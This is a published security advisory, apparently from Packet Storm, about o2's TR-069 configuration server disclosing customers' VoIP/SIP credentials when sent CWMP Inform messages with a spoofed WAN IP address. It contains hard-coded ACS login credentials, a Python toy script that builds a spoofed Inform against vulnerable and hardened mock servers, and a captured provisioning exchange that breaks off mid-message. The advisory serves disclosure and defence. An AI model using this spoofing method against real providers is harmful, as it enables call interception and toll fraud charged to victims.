o2 DSL Auto Configuration Server Credential Disclosure

2016-01-08T00:00:00
ID PACKETSTORM:135187
Type packetstorm
Reporter redteam-pentesting.de
Modified 2016-01-08T00:00:00

Description

                                        
                                            `Advisory: o2/Telefonica Germany: ACS Discloses VoIP/SIP Credentials  
  
The o2 Auto Configuration Server (ACS) discloses VoIP/SIP credentials of  
arbitrary customers when receiving manipulated CWMP packets. These  
credentials can then be used by an attacker to register any VoIP number  
of the victim. This enables the attacker to place and receive calls on  
behalf of the attacked user.  
  
  
Details  
=======  
  
Product: o2 DSL Auto Configuration Server  
Vulnerability Type: Information Disclosure  
Security Risk: high  
Vendor URL: https://o2online.de/  
Vendor Status: fixed  
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-005  
Advisory Status: published  
CVE: not assigned
  
  
Introduction  
============  
  
TR-069 (Technical Report 069) is a Broadband Forum technical  
specification entitled "CPE WAN Management Protocol" (CWMP). It defines  
an application layer protocol for remote management of end-user devices.  
  
(from Wikipedia)  
  
A more technical introduction to TR-069 can be found in a deck of slides  
which the Interoperability Laboratory at the University of New Hampshire  
has published on that topic [0].  
  
  
More Details  
============  
  
The German Internet Service Provider o2 uses the TR-069 protocol for the  
provisioning of Customer Premises Equipment (CPE). Among other settings,  
VoIP/SIP credentials are transferred and VoIP telephony is set up.  
  
In our setup, an AVM FRITZ!Box 7490 was monitored during the initial  
autoconfiguration process. During that process, several CWMP messages  
are exchanged. These CWMP messages are transferred via HTTPS as SOAP  
requests and replies. The HTTPS connection is always established by the
CPE, which connects to the Auto Configuration Server (ACS). According to
the CWMP specification, the CPE does so on the occasion of several
events, including, but not limited to:
  
* BOOTSTRAP - first contact between CPE and ACS  
* BOOT - when CPE has rebooted  
* PERIODIC - after a period of time, defined by the ACS  
* CONNECTION REQUEST - ACS signals a connection request to the CPE via a  
second HTTP channel  
  
The "CONNECTION REQUEST" is the only event that can be triggered by the  
ACS. To do so, the ACS establishes an unencrypted HTTP connection to the  
CPE and authenticates via HTTP basic access authentication with a  
"ConnectionRequestUsername" and a "ConnectionRequestPassword". No  
further data is exchanged on that channel. Once the CPE has verified the  
credentials, it then initiates the real CWMP conversation by sending a  
CWMP-Inform message to the pre-defined ACS. The connection initiated by  
the CPE is TLS-secured and the CPE provides a username  
(ManagementServer.Username) and a password (ManagementServer.Password)  
to authenticate itself towards the ACS.  
  
A typical CWMP conversation (including the "CONNECTION REQUEST" event)  
is depicted below:  
  
  
             .---------------Connection Request---------------.      ]
             |                                                |      ]
             v                                                |      ]
        ----------.                                  .--------       ]---> HTTP
        |Port|    |                                  |               ]
        |8089|    |                                  |               ]
        `----'    |                                  |    ACS        ]
             |    |                                  |
             |    |                                  |----.          ]
             `----> | ---Inform------------------------> |    |      ]
                    | <---InformResponse---------------- |    |      ]
                    |                                    |    |      ]
                    | ---[empty]-----------------------> |    |      ]
                    | <---SetParameterValues------------ |    |      ]
                    |                                    |    |      ]
                    | ---SetParameterValuesResponse----> |Port|      ]---> CWMP
                    | <---SetParameterValues------------ | 443|      ] (HTTPS)
                    |                                    |    |      ]
          CPE       |        [...]                       |    |      ]
                    |                                    |    |      ]
                    | ---SetParameterValuesResponse----> |    |      ]
                    | <---[empty]----------------------- |    |      ]
                    |                                    |    |      ]
  
During our research, it was observed that the ACS URL as well as  
credentials for the initial connection to the ACS are hard-coded. On a  
stock AVM FRITZ!Box, running the firmware version 6.20, these can be  
found in the file ./providers/otwored/tr069.cfg which is part of the  
archive /etc/default.Fritz_Box_HW185/avm/providers-049.tar. For  
o2/Telefonica these credentials are:  
  
tr069cfg {
    enabled = yes;
    igd {
        DeviceInfo {
            ProvisioningCode = "";
        }
        managementserver {
            url = "https://acs.o2online.de/nbbs/tr69";
            username = "00040E-000000000000";
            password = "o2acs";
            URLAlreadyContacted = no;
            PeriodicInformEnable = yes;
            PeriodicInformInterval = 3600;
        }
    }
    FirmwareDownload {
        enabled = yes;
        enabled_converted = yes;
    }
    ACS_SSL {
        verify_server = yes;
        trusted_ca_file = "/etc/default/avm/root_ca.pem";
    }
    Download_SSL {
        verify_server = yes;
        trusted_ca_file = "/etc/default/avm/root_ca.pem";
    }
}
  
To ease the interaction with the ACS, a minimal TR-069 client was  
implemented. With this rogue client it was possible to simulate the  
behaviour of an AVM FRITZ!Box 7490 during the initial autoconfiguration  
process. Thus, in the following description, the word "CPE" may be  
replaced equally with "rogue client".  
  
After the CPE connects to the ACS (see [msg00] in section Proof of  
Concept), it gets configured to accept new credentials for incoming  
connection requests:  
  
* InternetGatewayDevice.ManagementServer.ConnectionRequestUsername  
* InternetGatewayDevice.ManagementServer.ConnectionRequestPassword  
(see [msg03])  
  
The CPE is now capable of receiving connection requests from the ACS.  
After several seconds, the ACS initiates a connection request and the  
CPE starts a CWMP conversation (see [msg06]). During that conversation,  
the ACS (ACS A) provides a new ACS URL (ACS B) together with a new set  
of login credentials for ACS B:  
  
* InternetGatewayDevice.ManagementServer.URL  
* InternetGatewayDevice.ManagementServer.Username  
* InternetGatewayDevice.ManagementServer.Password  
* InternetGatewayDevice.ManagementServer.ConnectionRequestUsername  
* InternetGatewayDevice.ManagementServer.ConnectionRequestPassword  
(see [msg09])  
  
Finally, the CPE is rebooted. From that point in time, all CWMP  
conversation is directed to ACS B. On the occasion of the "BOOT" event,  
the CPE connects to ACS B (see [msg12]) and receives the following  
settings:  
  
* InternetGatewayDevice.ManagementServer.PeriodicInformEnable  
* InternetGatewayDevice.ManagementServer.PeriodicInformInterval  
* InternetGatewayDevice.ManagementServer.PeriodicInformTime  
(see [msg15])  
  
After several seconds, the CPE again receives a connection request. It
connects to ACS B once more (see [msg18]) and receives the VoIP
credentials for all telephone numbers that are assigned to the customer:
  
* InternetGatewayDevice.Services.VoiceService.1.  
VoiceProfile.1.Line.1.DirectoryNumber  
* InternetGatewayDevice.Services.VoiceService.1.  
VoiceProfile.1.Line.1.SIP.AuthUserName  
* InternetGatewayDevice.Services.VoiceService.1.  
VoiceProfile.1.Line.1.SIP.AuthPassword  
* InternetGatewayDevice.Services.VoiceService.1.  
VoiceProfile.1.Line.1.SIP.RegistrarServer  
* InternetGatewayDevice.Services.VoiceService.1.  
VoiceProfile.1.Line.1.SIP.OutboundProxy  
(see [msg23])  
  
The first digits of the AuthPassword are taken from the phone number.  
  
In summary, the CPE has received VoIP credentials while it only supplied  
hard-coded login credentials for ACS A. As a result, the ACS must have  
identified the CPE by the WAN IP address. It was further determined that  
the ACS relies on the WAN/IPv4 address, which is specified as the  
parameter  
  
* InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.  
WANIPConnection.1.ExternalIPAddress  
  
in the CWMP-Inform messages (see [msg00,06,12,18]).  
  
These CWMP-Inform messages can be manipulated by an attacker and  
therefore may contain arbitrary WAN IP addresses. If an attacker sends  
such spoofed CWMP-Inform messages during the whole two-step  
auto-provisioning process, the ACS returns VoIP credentials which are  
assigned to the IP address specified by the attacker.  
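The following Python script is an added illustration for this advisory; it is neither the rogue TR-069 client used during the research nor any code of o2's ACS. It builds an Inform with the shape of [msg00], lets a toy ACS answer with a SetParameterValues in the shape of [msg23], and contrasts two ways the ACS can decide whose SIP line to hand out: keyed on the ExternalIPAddress parameter the CPE asserts (the flaw described above), or keyed on the address the connection was actually observed from, refusing an Inform that claims a different one. The second variant is an assumed hardening chosen for the example, not the vendor's fix; since the CPE presents only the shared hard-coded credentials to ACS A, the observed connection is the only per-subscriber fact the ACS has. The subscriber table, addresses, SIP credentials and the ParameterKey value are constructed for the demo.

```python
"""Toy CWMP (TR-069) provisioning exchange modelled on [msg00] and [msg23].

Added example, not the advisory's rogue client and not o2's ACS. Subscriber
records, addresses and credentials below are constructed for the demo.
"""
import xml.etree.ElementTree as ET

NS = {"soap": "http://schemas.xmlsoap.org/soap/envelope/",
      "soap-enc": "http://schemas.xmlsoap.org/soap/encoding/",
      "xsi": "http://www.w3.org/2001/XMLSchema-instance",
      "xsd": "http://www.w3.org/2001/XMLSchema",
      "cwmp": "urn:dslforum-org:cwmp-1-0"}
for _prefix, _uri in NS.items():
    ET.register_namespace(_prefix, _uri)

EXT_IP = ("InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1."
          "WANIPConnection.1.ExternalIPAddress")
LINE = "InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.Line.1."
SIP_USER, SIP_PASS = LINE + "SIP.AuthUserName", LINE + "SIP.AuthPassword"

# Constructed subscriber table: WAN address assigned by the ISP -> SIP line.
SUBSCRIBERS = {
    "78.48.0.1": {SIP_USER: "463111111", SIP_PASS: "0241463111111xyz"},  # victim
    "78.48.0.2": {SIP_USER: "463222222", SIP_PASS: "0241463222222abc"},  # attacker
}


def _q(prefix, tag):
    return "{%s}%s" % (NS[prefix], tag)


def _envelope(msg_id):
    """SOAP envelope with the cwmp:ID header that every CWMP message carries."""
    env = ET.Element(_q("soap", "Envelope"))
    env.set("xmlns:xsd", NS["xsd"])  # declared for the xsd:string type values
    ident = ET.SubElement(ET.SubElement(env, _q("soap", "Header")), _q("cwmp", "ID"))
    ident.set(_q("soap", "mustUnderstand"), "1")
    ident.text = msg_id
    return env, ET.SubElement(env, _q("soap", "Body"))


def _param_list(parent, params):
    plist = ET.SubElement(parent, "ParameterList")
    plist.set(_q("soap-enc", "arrayType"), "cwmp:ParameterValueStruct[%d]" % len(params))
    for name, value in params.items():
        pvs = ET.SubElement(plist, "ParameterValueStruct")
        ET.SubElement(pvs, "Name").text = name
        val = ET.SubElement(pvs, "Value")
        val.set(_q("xsi", "type"), "xsd:string")
        val.text = value


def build_inform(serial, events, params, msg_id="100"):
    """CPE side: an Inform shaped like [msg00]; `params` is under CPE control."""
    env, body = _envelope(msg_id)
    inform = ET.SubElement(body, _q("cwmp", "Inform"))
    dev = ET.SubElement(inform, "DeviceId")
    for tag, text in (("Manufacturer", "AVM"), ("OUI", "00040E"),
                      ("ProductClass", "FRITZ!Box"), ("SerialNumber", serial)):
        ET.SubElement(dev, tag).text = text
    evs = ET.SubElement(inform, "Event")
    evs.set(_q("soap-enc", "arrayType"), "cwmp:EventStruct[%d]" % len(events))
    for code in events:
        es = ET.SubElement(evs, "EventStruct")
        ET.SubElement(es, "EventCode").text = code
        ET.SubElement(es, "CommandKey")
    ET.SubElement(inform, "MaxEnvelopes").text = "1"
    ET.SubElement(inform, "RetryCount").text = "0"
    _param_list(inform, params)
    return ET.tostring(env, encoding="unicode")


def build_set_parameter_values(params, msg_id, parameter_key):
    """ACS side: a SetParameterValues shaped like [msg23]."""
    env, body = _envelope(msg_id)
    spv = ET.SubElement(body, _q("cwmp", "SetParameterValues"))
    _param_list(spv, params)
    ET.SubElement(spv, "ParameterKey").text = parameter_key
    return ET.tostring(env, encoding="unicode")


def parse_params(xml_text):
    """Either side: (cwmp:ID, {Name: Value}) from any ParameterValueStruct list."""
    root = ET.fromstring(xml_text)
    msg_id = (root.findtext(".//cwmp:ID", namespaces=NS) or "").strip()
    return msg_id, {pvs.findtext("Name", "").strip(): pvs.findtext("Value", "").strip()
                    for pvs in root.iter("ParameterValueStruct")}


def acs_vulnerable(inform_xml, peer_ip):
    """Keys the lookup on the address the CPE *claims* in its Inform (the flaw).
    `peer_ip`, the address the connection came from, is ignored."""
    msg_id, params = parse_params(inform_xml)
    line = SUBSCRIBERS.get(params.get(EXT_IP))
    return build_set_parameter_values(line, msg_id, "39315851") if line else None


def acs_fixed(inform_xml, peer_ip):
    """Keys the lookup on the observed peer address (assumed hardening, not the
    vendor's fix) and refuses an Inform whose ExternalIPAddress disagrees."""
    msg_id, params = parse_params(inform_xml)
    line = SUBSCRIBERS.get(peer_ip)
    if line is None or params.get(EXT_IP) != peer_ip:
        return None
    return build_set_parameter_values(line, msg_id, "39315851")


def sip_credentials(spv_xml):
    """CPE side: pull the SIP login out of a SetParameterValues, as a rogue client would."""
    if spv_xml is None:
        return None
    _, params = parse_params(spv_xml)
    return params.get(SIP_USER), params.get(SIP_PASS)


def spoofed_run(acs):
    """Attacker connecting from 78.48.0.2 sends an Inform naming the victim's 78.48.0.1."""
    inform = build_inform("0896D776FAA2", ["6 CONNECTION REQUEST"],
                          {EXT_IP: "78.48.0.1"}, msg_id="null0")
    return sip_credentials(acs(inform, peer_ip="78.48.0.2"))
```

spoofed_run(acs_vulnerable) yields the victim line's AuthUserName and AuthPassword even though the connection came from the attacker's address, which is the disclosure described above in miniature; spoofed_run(acs_fixed) yields None, while an Inform whose ExternalIPAddress matches the observed peer is still provisioned normally.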
  
Additionally, any VoIP number issued by o2 may be registered from any o2
DSL account. Even if the number is already registered by the legitimate
customer's CPE, an attacker may register it a second time. Incoming
calls are then delivered to both registrations and may be answered by
either of them. Furthermore, the attacker can place and receive phone
calls on behalf of any other customer, and the victim is charged for
any costs resulting from the abuse.
  
  
Proof of Concept  
================  
  
As a proof of concept, the CWMP conversation that was captured during  
the autoprovisioning of an AVM FRITZ!Box 7490 (Firmware 6.20) is given  
below. Each message is the body of an HTTPS POST request (to the ACS) or  
an HTTPS POST reply (from the ACS). Some messages have been wrapped to  
obtain better readability.  
  
Communication with ACS A:  
  
------------------------------------------------------------------------  
[msg00] CPE -> ACS A:  
---------------------  
  
<?xml version="1.0"?>  
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">  
<soap:Header>  
<cwmp:ID soap:mustUnderstand="1">100</cwmp:ID>  
</soap:Header>  
<soap:Body>  
<cwmp:Inform>  
<DeviceId>  
<Manufacturer>AVM</Manufacturer>  
<OUI>00040E</OUI>  
<ProductClass>FRITZ!Box</ProductClass>  
<SerialNumber>0896D776FAA2</SerialNumber>  
</DeviceId>  
<Event soap-enc:arrayType="cwmp:EventStruct[2]">  
<EventStruct>  
<EventCode>1 BOOT</EventCode>  
<CommandKey/>  
</EventStruct>  
<EventStruct>  
<EventCode>0 BOOTSTRAP</EventCode>  
<CommandKey/>  
</EventStruct>  
</Event>  
<MaxEnvelopes>1</MaxEnvelopes>  
<CurrentTime>2014-09-08T18:27:32+02:00</CurrentTime>  
<RetryCount>0</RetryCount>  
<ParameterList soap-enc:arrayType="cwmp:ParameterValueStruct[8]">  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceSummary</Name>  
<Value xsi:type="xsd:string">  
InternetGatewayDevice:1.4[](Baseline:2, EthernetLAN:1,  
ADSLWAN:1,ADSL2WAN:1, Time:2, IPPing:1, WiFiLAN:2,  
DeviceAssociation:1), VoiceService:1.0[2](SIPEndpoint:1,  
Endpoint:1, TAEndpoint:1), StorageService:1.0[1](Baseline:1,  
FTPServer:1, NetServer:1, HTTPServer:1, UserAccess:1,  
VolumeConfig:1)  
</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.HardwareVersion</Name>  
<Value xsi:type="xsd:string">FRITZ!Box 7490</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.SoftwareVersion</Name>  
<Value xsi:type="xsd:string">113.06.20</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.SpecVersion</Name>  
<Value xsi:type="xsd:string">1.0</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.ProvisioningCode</Name>  
<Value xsi:type="xsd:string"/>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.ParameterKey  
</Name>  
<Value xsi:type="xsd:string"/>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.ConnectionRequestURL  
</Name>  
<Value xsi:type="xsd:string">  
http://78.48.x.x:8089/869f7018  
</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.  
WANIPConnection.1.ExternalIPAddress  
</Name>  
<Value xsi:type="xsd:string">78.48.x.x</Value>  
</ParameterValueStruct>  
</ParameterList>  
</cwmp:Inform>  
</soap:Body>  
</soap:Envelope>  
  
[msg01] CPE <- ACS A:  
---------------------  
  
<?xml version="1.0"?>  
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"  
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">  
<soapenv:Header>  
<cwmp:ID soapenv:mustUnderstand="1">100</cwmp:ID>  
</soapenv:Header>  
<soapenv:Body>  
<cwmp:InformResponse>  
<MaxEnvelopes>1</MaxEnvelopes>  
</cwmp:InformResponse>  
</soapenv:Body>  
</soapenv:Envelope>  
  
[msg02] CPE -> ACS A:  
---------------------  
  
[empty]  
  
[msg03] CPE <- ACS A:  
---------------------  
  
<?xml version="1.0"?>  
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"  
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">  
<soapenv:Header>  
<cwmp:ID soapenv:mustUnderstand="1">null0</cwmp:ID>  
</soapenv:Header>  
<soapenv:Body>  
<cwmp:SetParameterValues>  
<ParameterList soap:arrayType="cwmp:ParameterValueStruct[4]">  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.PeriodicInformEnable  
</Name>  
<Value xsi:type="xsd:boolean">1</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.  
ConnectionRequestUsername  
</Name>  
<Value xsi:type="xsd:string">0896D776FAA2</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.  
ConnectionRequestPassword</Name>  
<Value xsi:type="xsd:string">  
57d29f69eca7b5ca484e4644bf9720  
</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.  
PeriodicInformInterval  
</Name>  
<Value xsi:type="xsd:unsignedInt">200</Value>  
</ParameterValueStruct>  
</ParameterList>  
<ParameterKey>null</ParameterKey>  
</cwmp:SetParameterValues>  
</soapenv:Body>  
</soapenv:Envelope>  
  
[msg04] CPE -> ACS A:  
---------------------  
  
<?xml version="1.0"?>  
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">  
<soap:Header>  
<cwmp:ID soap:mustUnderstand="1">null0</cwmp:ID>  
</soap:Header>  
<soap:Body>  
<cwmp:SetParameterValuesResponse>  
<Status>0</Status>  
</cwmp:SetParameterValuesResponse>  
</soap:Body>  
</soap:Envelope>  
  
[msg05] CPE <- ACS A:  
---------------------  
  
[empty]  
  
[msg06] CPE -> ACS A:  
---------------------  
  
<?xml version="1.0"?>  
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">  
<soap:Header>  
<cwmp:ID soap:mustUnderstand="1">null0</cwmp:ID>  
</soap:Header>  
<soap:Body>  
<cwmp:Inform>  
<DeviceId>  
<Manufacturer>AVM</Manufacturer>  
<OUI>00040E</OUI>  
<ProductClass>FRITZ!Box</ProductClass>  
<SerialNumber>0896D776FAA2</SerialNumber>  
</DeviceId>  
<Event soap-enc:arrayType="cwmp:EventStruct[1]">  
<EventStruct>  
<EventCode>6 CONNECTION REQUEST</EventCode>  
<CommandKey/>  
</EventStruct>  
</Event>  
<MaxEnvelopes>1</MaxEnvelopes>  
<CurrentTime>2014-09-08T18:27:34+02:00</CurrentTime>  
<RetryCount>0</RetryCount>  
<ParameterList soap-enc:arrayType="cwmp:ParameterValueStruct[8]">  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceSummary</Name>  
<Value xsi:type="xsd:string">  
InternetGatewayDevice:1.4[](Baseline:2, EthernetLAN:1,  
ADSLWAN:1,ADSL2WAN:1, Time:2, IPPing:1, WiFiLAN:2,  
DeviceAssociation:1), VoiceService:1.0[2](SIPEndpoint:1,  
Endpoint:1, TAEndpoint:1), StorageService:1.0[1](Baseline:1,  
FTPServer:1, NetServer:1, HTTPServer:1, UserAccess:1,  
VolumeConfig:1)  
</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.HardwareVersion</Name>  
<Value xsi:type="xsd:string">FRITZ!Box 7490</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.SoftwareVersion</Name>  
<Value xsi:type="xsd:string">113.06.20</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.SpecVersion</Name>  
<Value xsi:type="xsd:string">1.0</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.ProvisioningCode</Name>  
<Value xsi:type="xsd:string"/>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.ParameterKey  
</Name>  
<Value xsi:type="xsd:string">null</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.ConnectionRequestURL  
</Name>  
<Value xsi:type="xsd:string">  
http://78.48.x.x:8089/869f7018  
</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.  
WANIPConnection.1.ExternalIPAddress  
</Name>  
<Value xsi:type="xsd:string">78.48.x.x</Value>  
</ParameterValueStruct>  
</ParameterList>  
</cwmp:Inform>  
</soap:Body>  
</soap:Envelope>  
  
[msg07] CPE <- ACS A:  
---------------------  
  
<?xml version="1.0"?>  
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"  
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">  
<soapenv:Header>  
<cwmp:ID soapenv:mustUnderstand="1">null0</cwmp:ID>  
</soapenv:Header>  
<soapenv:Body>  
<cwmp:InformResponse>  
<MaxEnvelopes>1</MaxEnvelopes>  
</cwmp:InformResponse>  
</soapenv:Body>  
</soapenv:Envelope>  
  
[msg08] CPE -> ACS A:  
---------------------  
  
[empty]  
  
[msg09] CPE <- ACS A:  
---------------------  
  
<?xml version="1.0"?>  
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"  
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">  
<soapenv:Header>  
<cwmp:ID soapenv:mustUnderstand="1">393158460</cwmp:ID>  
</soapenv:Header>  
<soapenv:Body>  
<cwmp:SetParameterValues>  
<ParameterList soap:arrayType="cwmp:ParameterValueStruct[5]">  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.ManagementServer.URL</Name>  
<Value xsi:type="xsd:string">  
https://hdm.o2online.de:443/cwmpWeb/CPEMgt  
</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.ManagementServer.Username</Name>  
<Value xsi:type="xsd:string">0896D776FAA2</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.ManagementServer.Password</Name>  
<Value xsi:type="xsd:string">1410193655111a</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.  
ConnectionRequestUsername  
</Name>  
<Value xsi:type="xsd:string">0896D776FAA2</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.  
ConnectionRequestPassword  
</Name>  
<Value xsi:type="xsd:string">1410193655111a</Value>  
</ParameterValueStruct>  
</ParameterList>  
<ParameterKey>39315846</ParameterKey>  
</cwmp:SetParameterValues>  
</soapenv:Body>  
</soapenv:Envelope>  
  
[msg10] CPE -> ACS A:  
---------------------  
  
<?xml version="1.0"?>  
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">  
<soap:Header>  
<cwmp:ID soap:mustUnderstand="1">393158460</cwmp:ID>  
</soap:Header>  
<soap:Body>  
<cwmp:SetParameterValuesResponse>  
<Status>0</Status>  
</cwmp:SetParameterValuesResponse>  
</soap:Body>  
</soap:Envelope>  
  
[msg11] CPE <- ACS A:  
---------------------  
  
initializeSession:null  
  
------------------------------------------------------------------------  
  
Communication with ACS B:  
  
------------------------------------------------------------------------  
[msg12] CPE -> ACS B:  
---------------------  
  
<?xml version="1.0"?>  
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">  
<soap:Header>  
<cwmp:ID soap:mustUnderstand="1">393158460</cwmp:ID>  
</soap:Header>  
<soap:Body>  
<cwmp:Inform>  
<DeviceId>  
<Manufacturer>AVM</Manufacturer>  
<OUI>00040E</OUI>  
<ProductClass>FRITZ!Box</ProductClass>  
<SerialNumber>0896D776FAA2</SerialNumber>  
</DeviceId>  
<Event soap-enc:arrayType="cwmp:EventStruct[2]">  
<EventStruct>  
<EventCode>1 BOOT</EventCode>  
<CommandKey/>  
</EventStruct>  
<EventStruct>  
<EventCode>0 BOOTSTRAP</EventCode>  
<CommandKey/>  
</EventStruct>  
</Event>  
<MaxEnvelopes>1</MaxEnvelopes>  
<CurrentTime>2014-09-08T18:27:35+02:00</CurrentTime>  
<RetryCount>0</RetryCount>  
<ParameterList soap-enc:arrayType="cwmp:ParameterValueStruct[8]">  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceSummary</Name>  
<Value xsi:type="xsd:string">  
InternetGatewayDevice:1.4[](Baseline:2, EthernetLAN:1,  
ADSLWAN:1,ADSL2WAN:1, Time:2, IPPing:1, WiFiLAN:2,  
DeviceAssociation:1), VoiceService:1.0[2](SIPEndpoint:1,  
Endpoint:1, TAEndpoint:1), StorageService:1.0[1](Baseline:1,  
FTPServer:1, NetServer:1, HTTPServer:1, UserAccess:1,  
VolumeConfig:1)  
</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.HardwareVersion</Name>  
<Value xsi:type="xsd:string">FRITZ!Box 7490</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.SoftwareVersion</Name>  
<Value xsi:type="xsd:string">113.06.20</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.SpecVersion</Name>  
<Value xsi:type="xsd:string">1.0</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.ProvisioningCode</Name>  
<Value xsi:type="xsd:string"/>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.ParameterKey  
</Name>  
<Value xsi:type="xsd:string">39315846</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.ConnectionRequestURL  
</Name>  
<Value xsi:type="xsd:string">  
http://78.48.x.x:8089/869f7018  
</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.  
WANIPConnection.1.ExternalIPAddress  
</Name>  
<Value xsi:type="xsd:string">78.48.x.x</Value>  
</ParameterValueStruct>  
</ParameterList>  
</cwmp:Inform>  
</soap:Body>  
</soap:Envelope>  
  
[msg13] CPE <- ACS B:  
---------------------  
  
<?xml version="1.0"?>  
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"  
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">  
<soapenv:Header>  
<cwmp:ID soapenv:mustUnderstand="1">393158460</cwmp:ID>  
</soapenv:Header>  
<soapenv:Body>  
